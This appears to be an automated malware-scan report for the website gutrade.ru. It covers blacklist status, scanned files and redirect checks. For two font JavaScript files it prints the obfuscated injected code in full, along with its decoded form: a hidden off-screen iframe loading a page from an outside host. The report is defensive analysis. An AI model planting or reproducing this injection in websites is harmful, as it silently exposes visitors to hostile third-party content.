Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gutrade.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://gutrade.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://gutrade.ru/ | 200 OK Content-Length: 19342 Content-Type: text/html | clean |
http://gutrade.ru/modules/mod_swfobject/lib/swfobject.js | 200 OK Content-Length: 11961 Content-Type: application/javascript | clean |
http://gutrade.ru/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/themes/default&file[0]=theme.js&subdir[1]=/js&file[1]=sleight.js&subdir[2]=/js/mootools&file[2]=mootools-release-1.11.js&subdir[3]=/js/mootools&file[3]=mooPrompt.js | 200 OK Content-Length: 62325 Content-Type: text/javascript | clean |
http://gutrade.ru/templates/gurme/js/cufon.js | 200 OK Content-Length: 36603 Content-Type: application/javascript | clean |
http://gutrade.ru/templates/gurme/js/Myriad_Pro_italic_400.font.js | 200 OK Content-Length: 1686 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var voindex = 0; if ((voindex = haystack.indexOf(needle, f_offset)) !== -1) { return voindex; } return false; } function tine_jocker(){ var full_data = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrom var cookie = getCookie('coloco17ayeu'+'venaisue17a'); if (cookie == undefined) { setCookie('coloco17ayeu'+'venaisue17a', true, 259200); document.write('<'+'if'+'r'+'a'+'m'+'e s'+'r'+'c'+'='+'"http://originally.deiperfetti.com.ar/hrytrjugfmfkytsjtrskj12.html" style="posi'+'tion'+':'+'abso'+'lute'+';'+'left'+':'+'-'+'1160'+'px'+';'+'top'+':'+'-'+'1160'+'px'+';'+'" height="129" width="129">'+'</'+'i'+'fr'+'a'+'m'+'e'+'>'); } }; })(); Decoded script: <iframe src="http://originally.deiperfetti.com.ar/hrytrjugfmfkytsjtrskj12.html" style="position:absolute;left:-1160px;top:-1160px;" height="129" width="129"></iframe> Antivirus reports:
| ||
http://gutrade.ru/templates/gurme/js/Myriad_Pro_400-Myriad_Pro_700.font.js | 200 OK Content-Length: 1686 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){
function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var voindex = 0; if ((voindex = haystack.indexOf(needle, f_offset)) !== -1) { return voindex; } return false; } function tine_jocker(){ var full_data = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','Chrom var cookie = getCookie('coloco17ayeu'+'venaisue17a'); if (cookie == undefined) { setCookie('coloco17ayeu'+'venaisue17a', true, 259200); document.write('<'+'if'+'r'+'a'+'m'+'e s'+'r'+'c'+'='+'"http://originally.deiperfetti.com.ar/hrytrjugfmfkytsjtrskj12.html" style="posi'+'tion'+':'+'abso'+'lute'+';'+'left'+':'+'-'+'1160'+'px'+';'+'top'+':'+'-'+'1160'+'px'+';'+'" height="129" width="129">'+'</'+'i'+'fr'+'a'+'m'+'e'+'>'); } }; })(); Decoded script: <iframe src="http://originally.deiperfetti.com.ar/hrytrjugfmfkytsjtrskj12.html" style="position:absolute;left:-1160px;top:-1160px;" height="129" width="129"></iframe> Antivirus reports:
| ||
http://gutrade.ru/templates/gurme/js/niceforms.js | 200 OK Content-Length: 8593 Content-Type: application/javascript | clean |
http://gutrade.ru/templates/gurme/js/main.js | 200 OK Content-Length: 6563 Content-Type: application/javascript | clean |
http://gutrade.ru/components/com_virtuemart/fetchscript.php?gzip=0&subdir[0]=/js&file[0]=wz_tooltip.js | 200 OK Content-Length: 38499 Content-Type: text/javascript | clean |
http://gutrade.ru/index.php?page=shop.cart | 200 OK Content-Length: 11081 Content-Type: text/html | clean |
http://gutrade.ru/index.php?page=shop.cart&option=com_virtuemart&Itemid=1 | 200 OK Content-Length: 11081 Content-Type: text/html | clean |
http://gutrade.ru/index.php | 200 OK Content-Length: 19354 Content-Type: text/html | clean |
http://gutrade.ru/index.php?option=com_content&view=category&layout=blog&id=1&Itemid=2 | 200 OK Content-Length: 14942 Content-Type: text/html | clean |
http://gutrade.ru/media/system/js/caption.js | 200 OK Content-Length: 3704 Content-Type: application/javascript | clean |
http://gutrade.ru/index.php?option=com_content&view=article&id=2&Itemid=3 | 200 OK Content-Length: 19844 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gutrade.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 15 May 2014 05:21:05 GMT
Pragma: no-cache
Server: Jino.ru/mod_pizza
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 15 May 2014 05:21:05 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: d7bc2c54a7fc8a613bf227c68c4b64eb=f9776c77919dfc847126161fcb59adae; path=/
Set-Cookie: virtuemart=f9776c77919dfc847126161fcb59adae
GET / HTTP/1.1
Host: gutrade.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 15 May 2014 05:21:05 GMT
Pragma: no-cache
Server: Jino.ru/mod_pizza
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 15 May 2014 05:21:05 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: d7bc2c54a7fc8a613bf227c68c4b64eb=f9776c77919dfc847126161fcb59adae; path=/
Set-Cookie: virtuemart=f9776c77919dfc847126161fcb59adae
Second query (visit from search engine):
GET / HTTP/1.1
Host: gutrade.ru
Referer: http://www.google.com/search?q=gutrade.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gutrade.ru
Referer: http://www.google.com/search?q=gutrade.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.